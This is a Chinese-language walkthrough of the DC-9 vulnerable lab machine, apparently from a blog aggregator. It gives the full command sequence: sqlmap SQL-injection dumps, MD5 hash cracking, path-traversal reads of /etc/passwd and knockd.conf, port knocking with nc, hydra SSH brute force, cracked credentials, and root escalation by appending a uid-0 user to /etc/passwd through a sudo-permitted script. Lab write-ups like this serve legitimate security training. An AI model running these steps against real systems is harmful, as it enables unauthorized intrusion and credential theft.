dc9靶机攻略

2023-10-25 09:20
文章标签 攻略 靶机 dc9

本文主要是介绍dc9靶机攻略,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

dc9

扫描

扫描结果如图

nmap

image-20231024213117827

目录扫描

image-20231024213131949

指纹扫描

image-20231024213156824

渗透

访问首页

image-20231024213222208

该处发现搜索框,正常搜名字可以直接返回该用户的信息,怀疑sql注入,使用单引号注入,发现没反应,再使用一下万能注入语句1' or 1=1

image-20231024214151575

image-20231024214201604

使用sqlmap

sqlmap -u 'http://10.4.7.152/results.php' --data 'search=1' --dbs --batch

爆出数据库staff和users

image-20231024215600177

爆表

sqlmap -u 'http://10.4.7.152/results.php' --data 'search=1' -D Staff --tables --batchsqlmap -u 'http://10.4.7.152/results.php' --data 'search=1' -D users --tables --batch

image-20231024215724573

暴列

sqlmap -u 'http://10.4.7.152/results.php' --data 'search=1' -D Staff -T Users --columns --batchsqlmap -u 'http://10.4.7.152/results.php' --data 'search=1' -D users -T UserDetails --columns --batch

image-20231024215804988

爆数据

sqlmap -u 'http://10.4.7.152/results.php' --data 'search=1' -D Staff -T Users -C Username,Password --dump --batchsqlmap -u 'http://10.4.7.152/results.php' --data 'search=1' -D users -T UserDetails -C username,password --dump --batch

得到一个admin用户信息以及user库中的用户信息

image-20231024215949015

image-20231024222141469

admin:856f5de590ef37314e7c3bdf6f8a66dc

拿去hash识别器识别一下

image-20231024220048377

使用md5解密最终得到

admin:transorbital1

image-20231024220307210

登录过后发现manage页左下角显示不存在文件

image-20231024221405809

疑似文件包含

反复回到根目录查看passwd文件,发现可以执行

image-20231024221514680

发现大部分用户都是/bin/bash的,尝试找到这些能利用的用户登录

将刚刚爆破的users库中的用户放置在txt文件里当字典

随后尝试爆破,发现ssh连不上

此时即为端口敲门

knocked配置文件在/etc/knockd.conf

image-20231024222941648

得到sequence=7469,8475,9842

向靶机三次敲门

nc 10.4.7.152 7469
nc 10.4.7.152 8475
nc 10.4.7.152 9842

image-20231024223404913

hydra爆出登录信息

hydra -L pojie1.txt -P pojie2.txt ssh://10.4.7.152 -t 50

image-20231024223644124

chandlerb:UrAG0D!
joeyt:Passw0rd
janitor:Ilovepeepee

提权

常规探查无效,经过寻找,在janitor的家目录下找到.secrets-for-putin目录

其中有密码文件

image-20231024225239575

BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

加入密码字典后重新爆破

发现多了个用户

fredf:B4-Tru3-001

切换该用户

使用sudo -l发现可以免密root身份执行test

查看test会乱码,直接执行试试

image-20231024225850139

提示需要找到test.py

find名字查找一下

find / -name test.py 2>/dev/null

image-20231024225954397

找到位置

/usr/lib/python3/dist-packages/setuptools/command/test.py

使用命令生成一个盐值为admin的md5密码

openssl passwd -1 -salt admin 123456
生成
$1$admin$LClYcRe.ee8dQwgrFc5nz.

将用户信息添加到/tmp/passwd

echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' > /tmp/passwd

image-20231024230856094

然后sudo使用符合脚本形式的执行参数

sudo ./test /tmp/passwd /etc/passwd

随后su 到刚刚创建的用户

su admin
123456

完成提权

image-20231024231143315

这篇关于dc9靶机攻略的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/281597

相关文章

大模型研发全揭秘:客服工单数据标注的完整攻略

在人工智能(AI)领域,数据标注是模型训练过程中至关重要的一步。无论你是新手还是有经验的从业者,掌握数据标注的技术细节和常见问题的解决方案都能为你的AI项目增添不少价值。在电信运营商的客服系统中,工单数据是客户问题和解决方案的重要记录。通过对这些工单数据进行有效标注,不仅能够帮助提升客服自动化系统的智能化水平,还能优化客户服务流程,提高客户满意度。本文将详细介绍如何在电信运营商客服工单的背景下进行

电脑桌面文件删除了怎么找回来?别急,快速恢复攻略在此

在日常使用电脑的过程中,我们经常会遇到这样的情况:一不小心,桌面上的某个重要文件被删除了。这时,大多数人可能会感到惊慌失措,不知所措。 其实,不必过于担心,因为有很多方法可以帮助我们找回被删除的桌面文件。下面,就让我们一起来了解一下这些恢复桌面文件的方法吧。 一、使用撤销操作 如果我们刚刚删除了桌面上的文件,并且还没有进行其他操作,那么可以尝试使用撤销操作来恢复文件。在键盘上同时按下“C

企业大模型落地的“最后一公里”攻略

一、大模型落地的行业现状与前景 大模型在多个行业展现出强大的应用潜力。在金融行业,沉淀了大量高质量数据,各金融平台用户数以亿计,交易数据浩如烟海。利用大模型分析处理这些数据,金融机构可以预测用户行为偏好,更高效、准确评估客户风险,实时监测交易和市场波动,及时制定策略。IDC 调研显示,超半数的金融机构计划在 2023 年投资生成式人工智能技术。 在科技领域,商汤人工智能大装置为大模型企业提

2025计算机毕业设计选题攻略

博主介绍:✌全网粉丝10W+,前互联网大厂软件研发、集结硕博英豪成立工作室。专注于计算机相关专业毕业设计项目实战6年之久,选择我们就是选择放心、选择安心毕业✌ 🍅由于篇幅限制,想要获取完整文章或者源码,或者代做,拉到文章底部即可看到个人VX。🍅 2023年 - 2024年 最新计算机毕业设计 本科 选题大全 汇总 计算机专业毕业设计之避坑指南(开题答辩选导师必看) 感兴趣的可以先收藏起来,还

2025届必备:如何打造Java SpringBoot大型超市数据处理系统,提升管理效率,最新攻略!

✍✍计算机编程指导师 ⭐⭐个人介绍:自己非常喜欢研究技术问题!专业做Java、Python、微信小程序、安卓、大数据、爬虫、Golang、大屏等实战项目。 ⛽⛽实战项目:有源码或者技术上的问题欢迎在评论区一起讨论交流! ⚡⚡ Java实战 | SpringBoot/SSM Python实战项目 | Django 微信小程序/安卓实战项目 大数据实战项目 ⚡⚡文末获取源码 文章目录

Spring data ES攻略

总结下es的使用,方便其他小伙伴使用 一、配置依赖 <dependency><groupId>org.springframework.data</groupId><artifactId>spring-data-elasticsearch</artifactId><version>2.0.4.RELEASE</version></dependency> 二、xml配置 创建xml文件,配

tomato靶场攻略

1.使用nmap扫描同网段的端口,发现靶机地址 2.访问到主页面,只能看到一个大西红柿 3.再来使用dirb扫面以下有那些目录,发现有一个antibot_image 4.访问我们扫到的地址 ,点金目录里看看有些什么文件 5.看到info.php很熟悉,点进去看看   6.查看源代码发现是通过GET方式传参的 ,有文件包含漏洞 7. 利用文件包含漏洞,我们尝试查看一

微信支付商家转账到零钱:快速开通攻略及功能全解

一、申请资格与条件 哪些商家可以申请商家转账到零钱功能? 仅公司性质的商户可以申请,个体工商户当前不支持此功能。商户账号应无正在进行的处罚,且历史无风险行为。微信支付账户没有历史违规记录。商家系统已经上线并可以访问。是否需要满足开通满90天和连续交易30天的要求? 目前商家转账到零钱及现金红包功能已取消该限制,新注册公司可直接申请,无需等待。 二、申请流程 如何申请开通商家转账到零钱功能

黑神话悟空大头怪怎么打 黑神话悟空大头怪攻打攻略

《黑神话悟空》中的大头娃娃作为新手村的敌人,让不少自信满满的玩家受挫,即便是花费近三百元成为“天命人”的玩家也难以轻易通过,甚至有的玩家连续奋战多日都无法顺利离开新手村。为此,小编特地整理了一份《黑神话悟空》大头娃娃无伤攻略,正在为此苦恼的小伙伴们不妨来参考一下。 对于想要提升游戏体验的玩家来说,一款优质的耳机是必不可少的装备。南卡OE MIX开放式耳机以其独特的不入耳佩戴方式,确保了长

免费SSL证书大全,附阿里云、腾讯云免费SSL证书申请攻略

免费SSL证书大全,附阿里云、百度云、腾讯云免费SSL证书申请攻略 摘要:随着这两年SSL证书的普及,使用了SSL证书启用了HTTPS协议的网站越来越多了,最近四座网为了把网站也开启全站HTTPS,特意申请了一个免费的SSL证书用了起来。同时也在百度云、阿里云、腾讯云三大国内的云服务平台都申请了免费SSL证书,以体验一下每个平台的免费SSL证书的差别。 ssl证书 随着这两年SSL证书的